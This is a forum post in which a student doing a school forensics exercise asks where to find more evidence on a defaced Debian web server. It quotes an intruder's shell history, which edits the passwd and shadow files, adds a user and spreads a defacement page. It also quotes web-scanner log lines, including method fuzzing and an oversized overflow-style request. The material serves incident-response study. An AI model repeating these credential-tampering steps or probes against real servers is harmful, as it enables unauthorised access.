Debian server has been hacked; where to look for evidence?

Discussion in 'all things UNIX' started by Eagle Creek, May 24, 2011.

Thread Status:
Not open for further replies.
  1. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Hey guys!

    Let me start by saying it’s a school assignment, and therefore not a real world situation. Nevertheless, I would appreciate any help I can get.

    The company ProvidIT has contacted us, their website has been hacked. Instead of their normal website, it shows “Buy creditcard details online, click here” (cc4u.jpg). A classical defacement.

    The following offenses also might have been committed. So it’s our job to find evidence for those offences.

    (I had to translate the Dutch law articles, so they might not be 100% acurate legally speaking, but you get the idea)

    - Unlawfully accessing automated systems
    - Copy or tap (eavesdrop) data after hacking
    - Unlawfully access or use system resources of a 3rd party computer
    - Deliberate access or impede the use of automated work by sending data (spam)
    - Tapping or recording ‘data’
    - Placing of recording equipment
    - Be in position of equipment capable of tapping
    - Publishing eavesdropped data
    - Create a malfunction in automated systems on purpose
    - On purpose altering data or making data unusable after hacking
    - Being responsible for alternating data or making data unusable

    We already found a lot of evidence. The problem with the evidence right now: it’s all circumstantial. We connect it to a conclusion of fact yet. The evidence is supposed to be used in a law suit, in which a hacker should get convicted for the facts mentioned above. Therefore, the evidence needs to be there and also preferably irrefutable.

    I’m going to provide you with a summary of the things we have found, and what it could mean.
    Since I’ve kinda exhausted my knowledge here, I need some help. What I like from you, is to tell me where to look for more evidence. Are there more log files I don’t know about, are there more system locations we need to investigate?
    We’re using Cain Live CD, Autospy to investigate the hacked server.

    Thanks very much in advance.

    -----------
    NOTABLE CHANGES / FILES
    We found both a passwd and a passwd-, and a shadow and shadow-.
    The passwd and shadow (without hyphen) have a user added (cees) when compared to the files with hyphens.

    Var/www -> index.html deleted 15-04-2010 (changed 9.57.51)

    /var/www/user/index.html -> defaced with cc4u
    Cc4u.jpg
    Cc4u.com site (URL)

    /var/www/user/leo/.bash_history
    CONTENTS OF THIS BASH_HISTORY:
    Code:
     ls
    ls -la
    cd ..
    cd /etcd /etc
    cd /etc
    ls
    nano passwd
    cp leo@ServerGroep1/etc/passwd /passwd.back
    cp leo@ServerGroep1:/etc/passwd /passwd.back
    scp leo@ServerGroep1:/etc/passwd /passwd.back
    nano passwd
    nano shadow
    logout 
    ls
    cp cc4u.jpg /var/www/user/cc4u.jpg
    cp index.html /var/www/user/index.html
    cd ..
    ls
    cp index.html /arno/index.html
    cd arno
    ls -la
    touch test
    ls -la
    rm test
    cd ..
    cp index.html /arno/index.html
    cp index.html arno/index.html
    cp cc4u.jpg arno/cc4u.jpg
    ls -l
    cp cc4u.jpg cees/cc4u.jpg
    cp cc4u.jpg ed/cc4u.jpg
    cp cc4u.jpg ellen/cc4u.jpg
    cp cc4u.jpg peter/cc4u.jpg
    cp cc4u.jpg tim/cc4u.jpg
    cp cc4u.jpg tom/cc4u.jpg
    cp cc4u.jpg ton/cc4u.jpg
    cp cc4u.jpg vincent/cc4u.jpg
    cp index.html arno/index.html
    cp index.html cees/index.html
    cp index.html ed/index.html
    cp index.html ellen/index.html
    cp index.html peter/index.html
    cp index.html tim/index.html
    cp index.html ton/index.html
    cp index.html vincent/index.html
    cd ..
    logout
    Question remaining: which user did this? He’s already in the system at this point.

    LOGFILES
    /var/log/apache2/acces.log
    Several attempts to find errors on the website, execute path traversal, etc.

    Code:
    10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
    W3af => web app attack and audit framework to find and exploit web apps vulnerabilities
    
    http 400 = bad request
    http 200 = successful
    
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "QWERTY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "TRACE / HTTP/1.0" 200 54 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "GET / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "HEAD / HTTP/1.0" 200 - "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "DELETE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "PUT / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "POST / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "COPY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MOVE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MKCOL / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPFIND / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPPATCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "LOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "UNLOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "SEARCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /asdfg.hjkl HTTP/1.0" 404 320 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/999.99" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/999.99" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / hhtp/999.99" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / http/999.99" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.9" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/9.Q" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.Q" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.X" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.10" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.1.0" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.2" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/2.1" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1,0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.0X" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/ HTTP/1.0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /HTTP/1.0" 404 318 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP /1.0" 501 325 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1 .0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1. 0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0 " 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "QWERTY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "TRACE / HTTP/1.0" 200 54 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "GET / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "HEAD / HTTP/1.0" 200 - "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "DELETE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "PUT / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "POST / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "COPY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MOVE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MKCOL / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPFIND / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPPATCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "LOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "UNLOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "SEARCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /asdfg.hjkl HTTP/1.0" 404 320 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/999.99" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/999.99" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / hhtp/999.99" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / http/999.99" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.9" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/9.Q" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.Q" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.X" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.10" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.1.0" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.2" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/2.1" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1,0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.0X" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/ HTTP/1.0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /HTTP/1.0" 404 318 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP /1.0" 501 325 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1 .0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1. 0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0 " 200 5518 "-"
    
    
    10.13.37.10 - - [12/Apr/2010:11:38:58 +0200] "SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 414 362 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:38:59 +0200] "GET /OvCgi/Main/Snmp.exe HTTP/1.1" 404 329 "-" "-"
